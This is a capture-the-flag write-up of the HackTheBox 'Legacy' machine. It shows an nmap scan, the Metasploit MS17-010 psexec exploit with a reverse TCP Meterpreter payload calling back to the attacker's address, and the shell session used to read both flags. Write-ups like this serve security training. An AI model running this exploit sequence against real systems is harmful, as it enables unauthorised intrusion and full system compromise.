HackTheBox: Legacy

I first started by running NMap against the host to discover running services:

# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h29m49s, deviation: 2h07m16s, median: 4d22h59m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:df:de (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-09-20T23:14:42+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user                                                                                                                                                                                                             
|   challenge_response: supported                                                                                                                                                                                                          
|_  message_signing: disabled (dangerous, but default)                                                                                                                                                                                     
|_smb2-time: Protocol negotiation failed (SMB2)                                                                                                                                                                                            
                                                                                                                                                                                                                                           
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                      
# Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds

We can see from this output that there are 2 ports open. 139 and 445. The SMB discovery script had also run and this service was running. Although there were no SMB shares.

Eternal Blue is one of the more common exploits for SMB, especially considering the OS is WinXP. I started Metasploit and loaded the MS17_010 exploit and ran it:

msf5 > use windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp                                                                                                                                                                   
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4                                                                                                                                                                           
rhost => 10.10.10.4                                                                                                                                                                                                                        
msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.16                                                                                                                                                                          
lhost => 10.10.14.16                                                                                                                                                                                                                       
msf5 exploit(windows/smb/ms17_010_psexec) > run                                                                                                                                                                                            
                                                                                                                                                                                                                                           
[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82256da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... KpPkSPCi.exe
[*] 10.10.10.4:445 - Created \KpPkSPCi.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \KpPkSPCi.exe...
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.4:1033) at 2020-09-15 15:26:50 -0400

meterpreter > 

meterpreter > cd /

meterpreter > ls
Listing: C:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
100777/rwxrwxrwx    0                  fil   2017-03-16 01:30:44 -0400        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 01:30:44 -0400        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:29 -0400        Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-13 16:13:04 -0400        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 01:20:57 -0400        Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:30 -0400        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 01:18:34 -0400        WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 01:20:02 -0400        boot.ini
100444/r--r--r--    250048             fil   2008-04-13 18:01:44 -0400        ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-15 22:18:24 -0500  pagefile.sys
100666/rw-rw-rw-    0                  fil   2020-09-20 17:03:03 -0400        pwned.txt

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 01:33:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 01:33:41 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 01:33:42 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:19:32 -0400  user.txt

meterpreter > cat user.txt
[REDACTED]
meterpreter >

From this output, you can see the exploit successfully ran and i was provided a meterpreter shell. From this shell i was able to browse to the Desktop under the John user and read the user flag.

I next tried to browse to the Adminstrator desktop and was successfully able to do this as well, allowing me to also capture the root flag.

meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
100777/rwxrwxrwx    0                  fil   2017-03-16 01:30:44 -0400        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 01:30:44 -0400        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:29 -0400        Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-13 16:13:04 -0400        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 01:20:57 -0400        Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:30 -0400        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 01:18:34 -0400        WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 01:20:02 -0400        boot.ini
100444/r--r--r--    250048             fil   2008-04-13 18:01:44 -0400        ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-15 22:18:24 -0500  pagefile.sys
100666/rw-rw-rw-    0                  fil   2020-09-20 17:03:03 -0400        pwned.txt

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd Administrator 
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 02:07:20 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 02:07:20 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 02:07:21 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:18:19 -0400  root.txt

meterpreter > cat root.txt 
[REDACTED]

meterpreter >

Leave a Reply

Your email address will not be published. Required fields are marked *